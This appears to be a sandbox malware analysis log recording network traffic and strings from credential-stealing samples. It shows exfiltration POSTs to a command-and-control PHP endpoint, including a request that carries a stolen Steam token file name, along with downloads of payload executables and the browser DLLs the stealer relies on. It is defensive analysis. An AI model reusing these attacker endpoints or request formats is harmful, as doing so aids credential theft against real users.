                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="file"------IJKJDAFHJDHIEBGCFIDB--
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGIEHIJKKFIDHDGIDHost: 185.172.128.76Content-Length: 129011Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFBHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="message"her7h48r------DAKEBAKFHCFHIEBFBAFB--
                                Source: global trafficHTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 185.172.128.90 185.172.128.90
                                Source: Joe Sandbox ViewIP Address: 185.172.128.228 185.172.128.228
                                Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                                Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                                Source: global trafficHTTP traffic detected: POST /__svc/sbv/DownloadManager.ashx HTTP/1.0Connection: keep-aliveContent-Length: 300Host: svc.iolo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: identityUser-Agent: Mozilla/3.0 (compatible; Indy Library)
                                Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.90
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.228
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: unknownTCP traffic detected without corresponding DNS query: 185.172.128.59
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0042676C __EH_prolog,WSAStartup,socket,WSACleanup,gethostbyname,htons,connect,send,send,recv,recv,recv,recv,recv,WSACleanup,closesocket,0_2_0042676C
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Apr 2024 06:48:51 GMTContent-Type: application/zipContent-Length: 3884863Last-Modified: Wed, 24 Apr 2024 05:45:46 GMTConnection: keep-aliveETag: "66289c8a-3b473f"Strict-Transport-Security: max-age=31536000Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb 78 6b ba 4b fa eb fb e5 c8 6f bd 44 1d da 82 f4 13 3a ec 6e 34 01 be 0b f5 50 3e be 84 2a 4d 86 5f 7c 1b a9 8d 50 a7 52 40 9d 67 57 00 90 af 6b 98 90 58 dd c1 01 4d 62 4d d5 0b 9a 17 00 48 0d e6 07 f5 11 e0 eb 20 0c be a0 97 c5 23 6f 05 43 43 fb 21 da b5 c6 fd 31 21 52 f5 67 a2 f2 0a f8 51 63 20 22 50 0d 95 ab c2 51 87 33 a0 48 d0 42 f3 46 e7 7c 1d c6 aa 91 29 97 e0 bd ea cf c6 f8 a9 ae 13 dc f0 40 81 bf 57 f3 a8 36 9f a1 5a 03 15 37 90 39 e0 b5 ed a2 af b6 fc ea 91 64 27 60 5f bf 36 c0 7a 72 25 61 c7 c3 b6 85 1b 00 2a 1e 37 00 2c 2e 92 dd 6c 0c e4 a8 8e a3 2e 68 cb 76 9f f4 18 a0 8b e3 50 0d 4f 05 66 e1 8d 15 21 f4 fd 59 b7 f3 23 b3 b0 59 81 37 cd c2 67 d5 d8 b9 76 3d c4 f0 6b 7f a3 00 f0 4a d5 f9 d4 4e 23 5c a5 35 cc 93 d7 c1 d2 c2 a3 5d cc a7 ca f8 ad 1f b6 3c cf 56 47 55 00 7e 99 cb 9d a8 c7 2c bd d1 58 1e 6f 9b 6b 2e 80 23 8f ce 3f 76 a1 16 25 88 30 ac 2b f2 f9 8d 6d d8 28 6d c5 9e ea 61 68 be 4a 47 3e 16 00 83 fd d8 6d f7 d1 56 99 9a 0c dd f7 d3 6b 62 c0 f3 9a f3 42 ab 6a 58 a1 17 bc 56 24 70 92 a9 93 20 ce 95 c7 3f 9b 3c d8 aa f7 16 bd 5e cf 1d cc 25 4b 41 3d 30 5c be 28 ba c3 09 a6 f8 b8 51 ac 6c 3e 8c 3b 78 ad db 23 57 d5 96 40 40 1b 74 49 55 20 1d a6 f3 51 1b a0 8c 08 9a a5 16 97 14 c2 c0 d9 90 19 2f 65 c9 99 37 45 77 c4 95 f5 7d 68 dc e2 5e 4e e2 02 c5 20 89 9e 18 bb c2 8f 91 f9 de 2b 95 e6 fb 0e c8 b2 c7 0f 8d a9 62 52 7a ca ea f7 1a e3 8b 0a 81 9a 86 32 72 a5 66 1e de 84 75 27 6f bc f1 73 1c 7d 31 05 f4 b8 6a c5 7b 10 27 25 b5 c0 19 b5 85 1a b6 3f ce 81 8d 5a 03 fc 4d d5 00 d3 d4 ca ae 39 2e 7c 50 be dd 57 a3 6f a9 d6 f9 63 a0 92 d1 9b 33 c0 00 ed 15 48 5c 87 34 95 a2 42 8a c6 a3 c0 dc df df 3b 31 34 d1 a2 36 35 93 51 33 00 85 b9 f7 32 34 24 8b ec
                                Source: global trafficHTTP traffic detected: GET /cpa/ping.php?substr=five&s=ab&sub=0 HTTP/1.1Host: 185.172.128.90User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /ping.php?substr=five HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /syncUpd.exe HTTP/1.1Host: 185.172.128.59User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /1/Package.zip HTTP/1.1Host: note.padd.cn.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /BroomSetup.exe HTTP/1.1Host: 185.172.128.228User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /tiktok.exe HTTP/1.1Host: 185.172.128.203Cache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: note.padd.cn.com
                                Source: global trafficDNS traffic detected: DNS query: svc.iolo.com
                                Source: global trafficDNS traffic detected: DNS query: download.iolo.net
                                Source: global trafficDNS traffic detected: DNS query: westus2-2.in.applicationinsights.azure.com
                                Source: unknownHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 38 37 35 41 31 36 36 42 41 31 31 37 32 30 30 30 39 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 42 2d 2d 0d 0a Data Ascii: ------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="hwid"79875A166BA11720009369------IJKJDAFHJDHIEBGCFIDBContent-Disposition: form-data; name="build"default10------IJKJDAFHJDHIEBGCFIDB--
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exe00
                                Source: u42w.0.exe, 00000001.00000002.2112134672.00000000292B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exeq
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.203/tiktok.exet-Disposition:
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/freebl3.dll
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/mozglue.dll5
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/msvcp140.dll
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dll
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/nss3.dllUK
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dll
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/softokn3.dllI
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/sqlite3.dll9
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/15f649199f40275b/vcruntime140.dll3
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.php639c1ec5fdf4178fa648df7975496release92036e868a3837ab3d0e58
                                Source: u42w.0.exe, 00000001.00000002.2112134672.00000000292B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.172.128.76/3cd2b41cbde8fc9c.phpt
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.00000000061FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                                Source: run.exe, 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2948318292.00000173F4AB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2944352752.00000173F47D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960025325.00000173F53B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
